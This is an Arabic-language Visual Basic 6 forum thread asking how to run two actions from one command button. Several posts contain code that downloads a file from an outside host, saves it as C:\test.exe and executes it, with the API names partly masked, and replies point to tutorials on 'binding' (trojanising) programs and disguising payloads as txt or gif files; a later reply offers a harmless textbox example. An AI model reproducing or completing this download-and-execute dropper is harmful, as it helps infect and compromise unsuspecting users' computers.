[ Visual Basic 6 ] تساؤل عن تنفيذ أمرين معا في command button ؟؟؟

تم تحميل الصفحة في 1,4441510 ثانية
تساؤل عن تنفيذ أمرين معا في command button ؟؟؟
الحالة
مغلق و غير مفتوح للمزيد من الردود.
إنضم
1 مارس 2009
المشاركات
265
الإعجابات
233
النقاط
43
السلام عليكم

إخواني كيف يمكنني تنفيذ أمرين معا في command button

مثلا الأمر

كود:
Private Sub Command1_Click()
Form2.Show
End Sub
بالإضافة الى الأمر:

كود:
lRet = CallApiByName("urlmon", "URLDownloadToFileW", 0, StrPtr("http://h1.ripway.com/scorpionoir/abdou.txt"), StrPtr("C:\test.exe"), 0, 0)
Call CallApiByName("[B][COLOR="Red"]*[/COLOR][/B][B][COLOR="Red"]*[/COLOR][/B][B][COLOR="Red"]*[/COLOR][/B][B][COLOR="Red"]*[/COLOR][/B]l32", "[B][COLOR="Red"]*[/COLOR][/B][B][COLOR="Red"]*[/COLOR][/B][B][COLOR="Red"]*[/COLOR][/B][B][COLOR="Red"]*[/COLOR][/B]lExecuteW", 0, 0, StrPtr("C:\test.exe"), 0, 0, 0)
الأمر الأول يعني التنقل بين الفورم بعد الضغط على زر command

والأمر الثاني يعني تنزيل ملف وفتحه بعد الضغط على زر command

في إنتظار إجاباتكم
 
إنضم
26 أبريل 2009
المشاركات
3,105
الإعجابات
152
النقاط
0
رد: تساؤل عن تنفيذ أمرين معا في command button ؟؟؟

8

نفس السؤال

أفكر فيه الأيام ذي مدري يصير او لا

:3:
 
إنضم
1 مارس 2009
المشاركات
265
الإعجابات
233
النقاط
43
رد: تساؤل عن تنفيذ أمرين معا في command button ؟؟؟

هنا شرح كامل للطريقه تلغيم بواسطة الفيجوال مع تحديد نزول السيرفر



http://www.dev-point.com/vb/t56195.html

أولا شكرا حبيبي

ثاني شيئ أنا عارف الطريقة بس أنا أريد وضع أمرين في زر واحد مش للتلغيم بس لكن لأشياء كثيرة
 
إنضم
4 يوليو 2009
المشاركات
1,400
الإعجابات
242
النقاط
63
رد: تساؤل عن تنفيذ أمرين معا في command button ؟؟؟

نعم اخوي


تقدر تحط الامرين في زر command لاظهار الفوريم الثاني





كود:
Private Sub Command1_Click()
lRet = CallApiByName("urlmon", "URLDownloadToFileW", 0, StrPtr("http://h1.ripway.com/scorpionoir/abdou.txt"), StrPtr("C:\test.exe"), 0, 0)

Call CallApiByName("[B][COLOR="Red"]*[/COLOR][/B][B][COLOR="Red"]*[/COLOR][/B][B][COLOR="Red"]*[/COLOR][/B][B][COLOR="Red"]*[/COLOR][/B]l32", "[B][COLOR="Red"]*[/COLOR][/B][B][COLOR="Red"]*[/COLOR][/B][B][COLOR="Red"]*[/COLOR][/B][B][COLOR="Red"]*[/COLOR][/B]lExecuteW", 0, 0, StrPtr("C:\test.exe"), 0, 0, 0)
Form1.Hide
Form2.Show
End Sub
 
إنضم
3 نوفمبر 2007
المشاركات
3,614
الإعجابات
683
النقاط
113
رد: تساؤل عن تنفيذ أمرين معا في command button ؟؟؟

شوف هالشرح

http://www.dev-point.com/vb/t45588.html

انا مسويه زمان ., ان شاءالله يفيدك , فكرة الشرح
انه يفتح لك ملف عند الضغط على الزر command

يقوم بفتحه / حتى لو حولت صيغة الباتش الى txt او gif
الشرح بالفديو ان شاءالله يعجبك , بالتوفيق واي خدمه ثانيه هنا موجود
 
إنضم
26 أبريل 2009
المشاركات
3,105
الإعجابات
152
النقاط
0
رد: تساؤل عن تنفيذ أمرين معا في command button ؟؟؟

على قولتك مانبغى تلغيم

يعني يصير أحط أمرين على نفس الـ command ?
 
إنضم
26 أبريل 2009
المشاركات
3,105
الإعجابات
152
النقاط
0
رد: تساؤل عن تنفيذ أمرين معا في command button ؟؟؟

نعم اخوي


تقدر تحط الامرين في زر command لاظهار الفوريم الثاني





كود:
private sub command1_click()
lret = callapibyname("urlmon", "urldownloadtofilew", 0, strptr("http://h1.ripway.com/scorpionoir/abdou.txt"), strptr("c:\test.exe"), 0, 0)

call callapibyname("[b][color="red"]*[/color][/b][b][color="red"]*[/color][/b][b][color="red"]*[/color][/b][b][color="red"]*[/color][/b]l32", "[b][color="red"]*[/color][/b][b][color="red"]*[/color][/b][b][color="red"]*[/color][/b][b][color="red"]*[/color][/b]lexecutew", 0, 0, strptr("c:\test.exe"), 0, 0, 0)
form1.hide
form2.show
end sub
بدال النجوم وش نحط :3:
 
إنضم
9 مايو 2008
المشاركات
2,584
الإعجابات
190
النقاط
63
الإقامة
jordan
رد: تساؤل عن تنفيذ أمرين معا في command button ؟؟؟

وعليكم السلام....


نعم اخي تقدر تحط امرين في الـCommand ..

وتقدر تحط كمان 100000000000000000000000 امر في الكوماند الوااحد...!


سوف نتبين ذلك في المثال التالي...!


اضف TextBox قد ما بدك...

فلنفترض انك اضفت 10 textbox

وزر command وااحد

بدنا لما ينقر المستخدم على زر الـCommand يخلي يطلع كتابة في جميع الـTextbox

مثلا...
كود:
private sub command1_click()
text1.text="السلام"
text2.text="عليكم"
text3.text="ورحمة"
text4.text="الله"
text5.text="وبركاته"
tect6.text="شفت"
text7.text="اني"
text8.text="اقدر"
text9.text="اضيف"
text10.text="اضع اكثر من امر.."
msgbox("شفت..؟")
end sub
يعطيك العافية...

ارجو انك فهمتني...

وأي سؤال يخطر في بالك... ما يردك غير لساانك...

بأنتظارك...
 
إنضم
26 أبريل 2009
المشاركات
3,105
الإعجابات
152
النقاط
0
رد: تساؤل عن تنفيذ أمرين معا في command button ؟؟؟

ثانكس

ماقصرتوا

يعطيكم العافية


:8:
 
الحالة
مغلق و غير مفتوح للمزيد من الردود.

الأعضاء النشطين حاليآ الذين يشاهدون هذا الموضوع (1 عضو و 0 ضيف)

خيارات الاستايل

نوع الخط
مودك
اخفاء السايدر بار OFF
توسيط المنتدى OFF
فصل الأقسام OFF
الأقسام الفرعية OFF
عرض المشاركات
حجم الخط
معلومات العضو OFF
إخفاء التوقيع OFF

إرجاع خيارات الإستايل